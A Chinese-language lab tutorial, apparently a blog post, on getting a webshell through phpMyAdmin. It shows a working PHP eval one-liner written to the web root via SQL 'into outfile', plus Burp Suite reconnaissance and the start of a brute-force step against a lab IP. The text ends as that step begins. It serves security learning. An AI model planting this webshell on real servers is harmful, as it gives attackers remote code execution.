之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就是通过phpMyAdmin来实现。
一般来说要利用SQL来实现一句话,有如下几种情况:
1.存在sql注入,在没有字符处理时可直接写入一句话(如Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/shell.php');
2.利用phpMyAdmin写入一句话(前提登录phpMyAdmin)
3.其次利用注入登录应用系统,发现应用系统的其它漏洞,完成getshell。
0x00 实验环境
1.一个安装phpMyAdmin的windows环境
2.使用工具burpsuit(可使用其他相关工具替换)
0x01 发现phpMyAdmin
输入ip,我们发现应用是一个后台登录系统,使用burpsuit代理并将目标网站发送至spider进行网页爬取,在target中查看网站目录(适当调整fitler可显示多个目录)
0x02 暴力破解
我们访问目标网站http://10.1.1.1